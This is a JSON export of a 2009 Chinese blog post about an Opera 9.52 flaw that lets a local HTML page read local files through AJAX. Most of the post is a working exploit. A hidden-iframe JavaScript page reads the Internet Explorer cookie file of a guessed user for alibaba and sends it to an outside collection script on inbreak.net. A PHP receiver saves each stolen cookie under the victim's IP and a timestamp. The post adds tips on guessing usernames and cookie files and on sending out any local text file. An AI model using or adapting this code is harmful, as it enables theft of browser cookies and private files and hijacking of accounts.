{"id":141,"date":"2009-01-05T12:08:38","date_gmt":"2009-01-05T12:08:38","guid":{"rendered":""},"modified":"2011-04-25T08:38:39","modified_gmt":"2011-04-25T08:38:39","slug":"opera-9-52%e4%bd%bf%e7%94%a8ajax%e8%af%bb%e5%8f%96%e6%9c%ac%e5%9c%b0%e6%96%87%e4%bb%b6%e6%bc%8f%e6%b4%9e","status":"publish","type":"post","link":"https:\/\/www.inbreak.net\/archives\/141.html","title":{"rendered":"opera 9.52\u4f7f\u7528ajax\u8bfb\u53d6\u672c\u5730\u6587\u4ef6\u6f0f\u6d1e"},"content":{"rendered":"

by \u7a7a\u865a\u6d6a\u5b50\u5fc3<\/p>\n

\u8fd9\u4e5f\u53ef\u80fd\u662f\u4e00\u4e2a\u5b89\u5168\u7279\u6027\u5427\uff0copera\u53ef\u4ee5\u4f7f\u7528ajax\u8bfb\u53d6\u672c\u5730\u6587\u4ef6\u3002<\/p>\n

ff3\u6ca1\u6709\u8fd9\u4e2a\u6f0f\u6d1e\u3002<\/p>\n

\u4e0d\u5e9f\u8bdd\uff0c\u770b\u4ee3\u7801\u5427\u3002<\/p>\n

\u5229\u7528\u65b9\u5f0f\u5982\u4e0b\uff1a<\/p>\n

\u8fd9\u6bb5\u4ee3\u7801\u4fdd\u5b58\u4e3a\u672c\u5730htm\u6587\u4ef6\uff0c\u7136\u540e\u4f7f\u7528opera\u6253\u5f00\u3002<\/p>\n

\u5c06\u4f1a\u628a\u672c\u5730\u7528\u6237\u540d\u4e3aadministrator\u5728alibaba\u7684cookie\uff0c\u53d1\u9001\u5230http:\/\/inbreak.net\/kxlzxtest\/testxss\/a.php<\/p>\n

<\/span><\/span><\/p>\n

\n
a.htm \u4ee3\u7801<\/div>\n
    \n
  1. <<\/span>iframe<\/span> <\/span>id<\/span>=<\/span>"framekxlzx"<\/span> <\/span>width<\/span>=<\/span>0<\/span> <\/span>height<\/span>=<\/span>0<\/span>><\/span><\/<\/span>iframe<\/span>><\/span>  <\/span><\/span><\/li>\n
  2. <<\/span>script<\/span>><\/span>  <\/span><\/span><\/li>\n
  3. var xmlHttp;  <\/span><\/li>\n
  4. function createXMLHttp(){  <\/span><\/li>\n
  5.     if(window.XMLHttpRequest){  <\/span><\/li>\n
  6.         xmlHttp<\/span> = <\/span>new<\/span> XMLHttpRequest();          <\/span><\/span><\/li>\n
  7.     }  <\/span><\/li>\n
  8.     else if(window.ActiveXObject){  <\/span><\/li>\n
  9.         xmlHttp<\/span> = <\/span>new<\/span> ActiveXObject("Microsoft.XMLHTTP");  <\/span><\/span><\/li>\n
  10.     }  <\/span><\/li>\n
  11. }  <\/span><\/li>\n
  12.   <\/span><\/li>\n
  13. function startRequest(doUrl){  <\/span><\/li>\n
  14.           <\/span><\/li>\n
  15.     createXMLHttp();  <\/span><\/li>\n
  16.       <\/span><\/li>\n
  17.     xmlHttp.onreadystatechange<\/span> = <\/span>handleStateChange<\/span>;  <\/span><\/span><\/li>\n
  18.       <\/span><\/li>\n
  19.     xmlHttp.open("GET", doUrl, true);  <\/span><\/li>\n
  20.       <\/span><\/li>\n
  21.     xmlHttp.send(null);  <\/span><\/li>\n
  22.       <\/span><\/li>\n
  23.       <\/span><\/li>\n
  24. }   <\/span><\/li>\n
  25.   <\/span><\/li>\n
  26. function handleStateChange(){  <\/span><\/li>\n
  27.     if (xmlHttp.readyState<\/span> == 4 ){  <\/span><\/span><\/li>\n
  28.             var strResponse<\/span> = <\/span>""<\/span>;  <\/span><\/span><\/li>\n
  29.             setTimeout("framekxlzxPost(xmlHttp.responseText)", 1000);   <\/span><\/li>\n
  30.               <\/span><\/li>\n
  31.     }  <\/span><\/li>\n
  32. }  <\/span><\/li>\n
  33.   <\/span><\/li>\n
  34. function doMyAjax(user,file)  <\/span><\/li>\n
  35. {  <\/span><\/li>\n
  36.         var time<\/span> = <\/span>Math<\/span>.random();  <\/span><\/span><\/li>\n
  37.           <\/span><\/li>\n
  38.         var strPer<\/span> = <\/span>‘file:\/\/localhost\/C:\/Documents%20and%20Settings\/’<\/span>+user+’\/Cookies\/’+file+’?<\/span>time<\/span>=’+time;  <\/span><\/span><\/li>\n
  39.           <\/span><\/li>\n
  40.         startRequest(strPer);  <\/span><\/li>\n
  41.       <\/span><\/li>\n
  42. }  <\/span><\/li>\n
  43.   <\/span><\/li>\n
  44. function framekxlzxPost(text)  <\/span><\/li>\n
  45. {  <\/span><\/li>\n
  46.     document.getElementById(‘framekxlzx’).src<\/span>=<\/span>"http:\/\/inbreak.net\/kxlzxtest\/testxss\/a.php?cookie="<\/span>+escape(text);  <\/span><\/span><\/li>\n
  47.     alert(\/ok\/);  <\/span><\/li>\n
  48. }  <\/span><\/li>\n
  49.   <\/span><\/li>\n
  50. doMyAjax(‘administrator’,’administrator@alibaba[1].txt’);  <\/span><\/li>\n
  51.   <\/span><\/li>\n
  52. <\/<\/span>script<\/span>><\/span>  <\/span><\/span><\/li>\n<\/ol>\n<\/div>\n

    a.php\u4ee3\u7801\uff1a<\/p>\n

    \n
    a.php \u4ee3\u7801<\/div>\n
      \n
    1. <?php      <\/span><\/span><\/li>\n
    2.    <\/span><\/li>\n
    3. $user_IP<\/span> = (<\/span>$_SERVER<\/span>[<\/span>"HTTP_VIA"<\/span>]) ? <\/span>$_SERVER<\/span>[<\/span>"HTTP_X_FORWARDED_FOR"<\/span>] : <\/span>$_SERVER<\/span>[<\/span>"REMOTE_ADDR"<\/span>];  <\/span><\/span><\/li>\n
    4. $user_IP<\/span> = (<\/span>$user_IP<\/span>) ? <\/span>$user_IP<\/span> : <\/span>$_SERVER<\/span>[<\/span>"REMOTE_ADDR"<\/span>];   <\/span><\/span><\/li>\n
    5.   <\/span><\/li>\n
    6. $fp<\/span> = <\/span>fopen<\/span>(<\/span>$user_IP<\/span>.<\/span>date<\/span>(<\/span>"Y-m-d H:i:s"<\/span>).<\/span>"cookie.txt"<\/span>,<\/span>"wb"<\/span>);     <\/span><\/span><\/li>\n
    7. fwrite($fp<\/span>,<\/span>$_GET<\/span>[<\/span>"cookie"<\/span>]);      <\/span><\/span><\/li>\n
    8. fclose($fp<\/span>);    <\/span><\/span><\/li>\n
    9. ?>     <\/span><\/li>\n<\/ol>\n<\/div>\n

      a.php\u4f1a\u6309\u7167   IP+\u65f6\u95f4+cookie.txt \u683c\u5f0f\u751f\u6210\u4e00\u4e2atxt\u6587\u4ef6\u3002<\/p>\n

      \u4f8b\u5982\uff1a121.0.29.2252009-01-05 11:55:02cookie.txt<\/p>\n

      \u91cc\u9762\u4fdd\u5b58\u7740administrator@alibaba[1].txt\u7684\u5185\u5bb9\u3002<\/p>\n

      \u51e0\u70b9\u8bf4\u660e\uff1a
      \n1\uff0ccookie\u6587\u4ef6\u662fIE\u7684\uff0c\u6bd4\u8f83XX\uff0c\u4f46\u662f\u6709\u5f88\u591a\u4eba\u90fd\u4f1aIE\u548copera\u6df7\u7528\u3002
      \n2\uff0c\u5fc5\u987b\u9884\u6d4b\u672c\u5730\u7528\u6237\u540d\uff0c\u4e0d\u8fc7\u5f88\u591a\u4eba\u90fd\u662fadministrator\u3002
      \n3\uff0c\u5fc5\u987b\u9884\u6d4bcookie\u6587\u4ef6\u540d\u3002\u8fd9\u4e2a\u53ef\u4ee5\u53d6\u4e00\u4e9b\u5e38\u7528\u7f51\u7ad9\u7684\uff0c\u53cd\u6b63ajax\u662f\u5f02\u6b65\uff0c\u4f60\u53ef\u4ee5\u540c\u65f6\u8c03\u7528\u51e0\u4e2a\u65b9\u6cd5\u3002
      \n4\uff0c\u6216\u8005\u4f60\u53ef\u4ee5\u53d1\u9001\u4efb\u4f55\u672c\u5730TXT\u6587\u4ef6\u3002<\/p>\n

      opera\u53ef\u80fd\u8bf4\u8fd9\u662f\u7279\u6027\uff1f\u4e0d\u77e5\u9053\u4e86\uff0c\u53cd\u6b63FF3\u6ca1\u8fd9\u4e2a\u6f0f\u6d1e\uff0c\u4f7f\u7528\u8fd9\u79cd\u65b9\u5f0f\u4f1a\u62a5\u9519\u8bbf\u95ee\u62d2\u7edd\u3002
      \n<\/span><\/p>\n","protected":false},"excerpt":{"rendered":"

      \u8fd9\u4e5f\u53ef\u80fd\u662f\u4e00\u4e2a\u5b89\u5168\u7279\u6027\u5427\uff0copera\u53ef\u4ee5\u4f7f\u7528ajax\u8bfb\u53d6\u672c\u5730\u6587\u4ef6\u3002<\/p>\n

      ff3\u6ca1\u6709\u8fd9\u4e2a\u6f0f\u6d1e\u3002<\/p>\n

      \u4e0d\u5e9f\u8bdd\uff0c\u770b\u4ee3\u7801\u5427\u3002<\/p>\n

      \u5229\u7528\u65b9\u5f0f\u5982\u4e0b\uff1a<\/p>\n

      \u8fd9\u6bb5\u4ee3\u7801\u4fdd\u5b58\u4e3a\u672c\u5730htm\u6587\u4ef6\uff0c\u7136\u540e\u4f7f\u7528opera\u6253\u5f00\u3002<\/p>\n

      \u5c06\u4f1a\u628a\u672c\u5730\u7528\u6237\u540d\u4e3aadministrator\u5728alibaba\u7684cookie\uff0c\u53d1\u9001\u5230http:\/\/inbreak.net\/kxlzxtest\/testxss\/a.php<\/span><\/span><\/p>\n

      \u7ee7\u7eed\u9605\u8bfb »<\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[86,5],"tags":[34,35],"views":3928,"_links":{"self":[{"href":"https:\/\/www.inbreak.net\/wp-json\/wp\/v2\/posts\/141"}],"collection":[{"href":"https:\/\/www.inbreak.net\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.inbreak.net\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.inbreak.net\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.inbreak.net\/wp-json\/wp\/v2\/comments?post=141"}],"version-history":[{"count":1,"href":"https:\/\/www.inbreak.net\/wp-json\/wp\/v2\/posts\/141\/revisions"}],"predecessor-version":[{"id":235,"href":"https:\/\/www.inbreak.net\/wp-json\/wp\/v2\/posts\/141\/revisions\/235"}],"wp:attachment":[{"href":"https:\/\/www.inbreak.net\/wp-json\/wp\/v2\/media?parent=141"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.inbreak.net\/wp-json\/wp\/v2\/categories?post=141"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.inbreak.net\/wp-json\/wp\/v2\/tags?post=141"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}